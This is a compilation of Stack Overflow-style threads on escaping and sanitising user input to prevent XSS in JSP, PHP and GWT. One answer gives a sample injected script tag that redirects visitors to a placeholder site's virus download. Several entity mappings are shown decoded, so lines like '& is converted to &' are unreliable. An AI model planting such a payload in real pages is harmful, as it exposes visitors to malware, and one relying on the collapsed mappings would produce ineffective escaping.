Given the message in a messages properties file:
message = Change relation <strong>{0}</strong> -> <strong>{1}</strong> to <strong>{2}</strong> -> <strong>{3}</strong>?
if the content of any of the placeholders is a user-influenced string, I need to html escape the message in order to prevent a potential XSS (I do that by using the c:out tag in my JSP templates, I guess I could use the htmlEscape-attribute of the spring:message tag as well, but I think there's no difference).
However by doing so, I corrupt the markup in the message, <strong> etc. which leads to the output:
Change relation <strong>Peter</strong> -> <strong>Car</strong> to <strong>Carl</strong> -> <strong>Bus</strong>?
I've already read the thread here on stackoverflow but it does not address XSS.
I am thinking about these options:
1) Simply replace all <strong> tags from the messages properties files with single quotes. Then there's no problem html escaping the entire message, with the drawback of a little less highlighting of the specific parts of the message.
2) Split the message into parts which allow for separate markup in the (JSP) template. This feels like much work just to get the markup right.
Am I missing something here? Which is the better option, or is there another option?
Edit: Without html-escaping the message is, like I want it to be, like this:
Change relation Peter -> Car to Carl -> Bus?
So the html-markup as in the messages.properties file is being rendered when displayed in the template.
When escaping, the message is like above, showing me the <strong> tags instead of rendering them.
Going under the assumption that you are getting the following output:
Change relation <strong>Peter</strong> -> <strong>Car</strong> to <strong>Carl</strong> -> <strong>Bus</strong>
It looks like you are escaping your entire HTML string rather than just the part that needs to be escaped.
You should escape each {#} value on its own, and then place it into the HTML. The general values you need to escape are: <, >, ', ", and &, but use an anti-xss library and templating system if you can.
Once you've escaped all the potentially dangerous parts, you can use something like <c:out value="${msg}" escapeXml="false"/>. This is not a language/framework I know, but you need some way to output the actual HTML vs the escaped version. Whatever way you prefer should be fine as long as you properly escape the untrusted part.
Related
In PHP, there is a function called htmlspecialchars() that performs the following substitutions on a string:
& (ampersand) is converted to &
" (double quote) is converted to "
' (single quote) is converted to ' (only if the flag ENT_QUOTES is set)
< (less than) is converted to <
> (greater than) is converted to >
Apparently, this is done on the grounds that these 5 specific characters are the unsafe HTML characters.
I can understand why the last two are considered unsafe: if they are simply "echoed", arbitrary/dangerous HTML could be delivered, including potential javascript with <script> and all that.
Question 1. Why are the first three characters (ampersand, double quote, single quote) also considered 'unsafe'?
Also, I stumbled upon this library called "he" on GitHub (by Mathias Bynens), which is about encoding/decoding HTML entities. There, I found the following:
[...] characters that are unsafe for use in HTML content (&, <, >, ", ', and `) will be encoded. [...]
(source)
Question 2. Is there a good reason for considering the backtick another unsafe HTML character? If yes, does this mean that PHP's function mentioned above is outdated?
Finally, all this begs the question:
Question 3. Are there any other characters that should be considered 'unsafe', alongside those 5/6 characters mentioned above?
Donovan_D's answer pretty much explains it, but I'll provide some examples here of how specifically these particular characters can cause problems.
Those characters are considered unsafe because they are the most obvious ways to perform an XSS (Cross-Site Scripting) attack (or break a page by accident with innocent input).
Consider a comment feature on a website. You submit a form with a textarea. It gets saved into the database, and then displayed on the page for all visitors.
Now I sumbit a comment that looks like this.
<script type="text/javascript">
window.top.location.href="http://www.someverybadsite.website/downloadVirus.exe";
</script>
And suddenly, everyone that visits your page is redirected to a virus download. The naive approach here is just to say, okay wellt hen let's filter out some of the important characters in that attack:
< and > will be replaced with < and > and now suddenly our script isn't a script. It's just some html-looking text.
A similar situation arsises with a comment like
Something is <<wrong>> here.
Supposing a user used <<...>> to emphasize for some reason. Their comment would render is
Something is <> here.
Obviously not desirable behavior.
A less malicious situation arises with &. & is used to denote HTML entities such as & and " and < etc. So it's fairly easy for innocent-looking text to accidentally be an html entity and end up looking very different and very odd for a user.
Consider the comment
I really like #455 ó please let me know when they're available for purchase.
This would be rendered as
I really like #455 ó please let me know when they're available for purchase.
Obviously not intended behavior.
The point is, these symbols were identified as key to preventing most XSS vulnerabilities/bugs most of the time since they are likely to be used in valid input, but need to be escaped to properly render out in HTML.
To your second question, I am personally unaware of any way that the backtick should be considered an unsafe HTML character.
As for your third, maybe. Don't rely on blacklists to filter user input. Instead, use a whitelist of known OK input and work from there.
These chars Are unsafe because in html the <> define a tag. The "", and '' are used to surround attributes. the & is encoded because of the use in html entities. no other chars Should be encoded but they can be ex: the trade symbol can be made into ™ the US dollar sign can be made into $ the euro can be € ANY emoji can be made out of a HTML entity (the name of the encoded things)you can find a explanation/examples here
Any widget that has setHTML method could give a hole in security system, but if we validate String & only accept some limited html tags such as <b>, <i>.... And then we put this string into setHTML method.
Then my question is "is it still safe if we do that"
For example, we check the String text to make sure it only contain some limited html tags <b>, </b>, <i>, </i>... If the string text contain other tags then we won't let uses to input that text. Then we use:
html1.setHTML(text); instead of html1.setHTML(SafeHtmlUtils.fromString(text))
i don't know why html1.setHTML(SafeHtmlUtils.fromString(text)) does not generate the formatted text, it just shows plain text when i run it in eclipse? For example
html1.setHTML(SafeHtmlUtils.fromString("<b>text</b>"))
will have plain text result <b>text</b> instead of bold text "text" with correct html format
You want to sanitize the html, not escape it. The fromString method is meant to escape the string - if a user types enters a < b, but forgets the space, then adds >c, you don't want the c to be bold and the b to be missing entirely. Escaping is done to actually render the string that is given, assuming it is text.
On the complete other end of the spectrum, you can use fromTrustedString which tells GWT that you absolutely trust the source of the data, and that you will allow it to do anything. This typically should not be done for any data that comes from the user.
Somewhere off to the side of all of the then we have sanitation, the process where you take a string that is meant to be HTML, and ensure it is safe, rather than either treating it like text, or trusting it implicitly. This is hard to do well - any tag that has a style attribute could potentially attack you (this is why GWT has SafeStyle like SafeHtml, any tag that has a uri, url or href could be used to attack (hence SafeUri), and any attribute that the browser treats as a callback such as onclick or the like can be used to run JavaScript. The HtmlSanitizer type is meant to be able to do this.
There is a built-in implementation of this, as of at least GWT 2.4 - SimpleHtmlSanitizer. This class whitelists certain html tags, including your <b> and <i> tags, as well as a few others. Attributes are completely removed, as there are too many cases where they might not be safe. As the class name suggests, this is just a simple approach to this problem - a more complex and in-depth approach might be more true to the original code, but this also comes with the risk of allowing unsafe HTML content.
i have created a site where users can make an account by typing in a username and password if i make an account and type <h1> dan</h1> as my username the username will show up on the site as a header. this can lead to loads of abuse if someone was to use perhaps an img src or a load of line breaks. how do i make the browser ignore the html tags so if i was to type <h1> dan</h1>that it would either get rid of the html or just print out the html as regular text.
Various answers for some programming languages have already been given. You might want to read about the underlying techniques (as well as other common threats in web development) on http://www.owasp.org/.
Welcome to the world of security issues in web development
What you are talking about is called input validation. A lot of work has already been done on this subject, and it is never a good idea to start doing this from scratch. The most important thing to remember is that input validation has to be done on the server side, as client side can easily be manipulated.
ESAPI (by OWASP) is an open source library for web security which amongst other things lets you do Input Validation, it has implementations in many languages including PHP and Java. If you're interested in using ESAPI with Java you can take a look at my blog where I use ESAPI for input validation, if you're using another language there are examples for those on the web.
You can use strip_tags() function in PHP.
Maybe you can clean html tags when you are creating the user on you server side code.
Also:
I think that is a must clean the values coming from the client side in the server side.
Either you'll have to get rid off all html tags, or - much simpler - replace all < and > characters with their html-encodings, < and >.
simply output the username using htmlspecialchars().
The translations performed are:
'&' (ampersand) becomes '&'
'"' (double quote) becomes '"' when ENT_NOQUOTES is not set.
"'" (single quote) becomes ''' (or ') only when ENT_QUOTES is set.
'<' (less than) becomes '<'
'>' (greater than) becomes '>'
You can't do this in the browser, you have to do this in your backend.
Identify allowed characters in username,password, whatever value you ask for
When the form is submitted -> validate the input against your previously defined pattern (on the server)
Escape/Encode your data before it is send to the client (browser), i.e. so that <h1> dan</h1> would become <h1glt; dan</h1>
Make yourself confident with some security concerns and how to avoid them like sql injection or crosssite scripting
I'm extracting some content from a website with this pattern:
([^+]+)
and it outputs
< img src=""http://www."" border=""0""/>
with double quotes. What is wrong with my query?
your problem only makes sense if you modify your regexp.
but first of all, beware:
in general, what you try to achieve is not feasible using regexes. they are the inappropriate tool to do it. you will not come up with a solution 100% correct using regexes.
having said this, try to replace ([^+]+) with (([^<!--]+([^<]|<[^!]|<![^-]|<!-[^-]))+). note that this regex assumes the following:
there are no html comments inside the message portion
there are no strings containing html comment openings inside the message portion
the message portion is a valid html fragment
(otherwise it would match eg. <!-<!-- / message -->)
you have been warned.
btw, the dquote doubling must be a standard escape mechanism of the imacro environment.
How do I limit the types of HTML that a user can input into a textbox? I'm running a small forum using some custom software that I'm beta testing, but I need to know how to limit the HTML input. Any suggestions?
i'd suggest a slightly alternative approach:
don't filter incoming user data (beyond prevention of sql injection). user data should be kept as pure as possible.
filter all outgoing data from the database, this is where things like tag stripping, etc.. should happen
keeping user data clean allows you more flexibility in how it's displayed. filtering all outgoing data is a good habit to get into (along the never trust data meme).
You didn't state what the forum was built with, but if it's PHP, check out:
http://htmlpurifier.org/
Library Features: Whitelist, Removal, Well-formed, Nesting, Attributes, XSS safe, Standards safe
Once the text is submitted, you could strip any/all tags that don't match your predefined set using a regex in PHP.
It would look something like the following:
find open tag (<)
if contents != allowed tag, remove tag (from <..>)
Parse the input provides and strip out all html tags that don't match exactly the list you are allowing. This can either be a complex regex, or you can do a stateful iteration through the char[] of the input string building the allowed input string and stripping unwanted attributes on tags like img.
Use a different code system (BBCode, Markdown)
Find some code online that already does this, to use as a basis for your implementation. For example Slashcode must perform this, so look for its implementation in the Perl and use the regexes (that I assume are there)
Regardless what you use, be sure to be informed of what kind of HTML content can be dangerous.
e.g. a < script > tag is pretty obvious, but a < style > tag is just as bad in IE, because it can invoke JScript commands.
In fact, any style="..." attribute can invoke script in IE.
< object > would be one more tag to be weary of.
PHP comes with a simple function strip_tag to strip HTML tags. It allows for certain tags to not be stripped.
Example #1 strip_tags() example
<?php
$text = '<p>Test paragraph.</p><!-- Comment --> Other text';
echo strip_tags($text);
echo "\n";
// Allow <p> and <a>
echo strip_tags($text, '<p><a>');
?>
The above example will output:
Test paragraph. Other text
<p>Test paragraph.</p> Other text
Personally for a forum, I would use BBCode or Markdown because the amount of support and features provided such as live preview.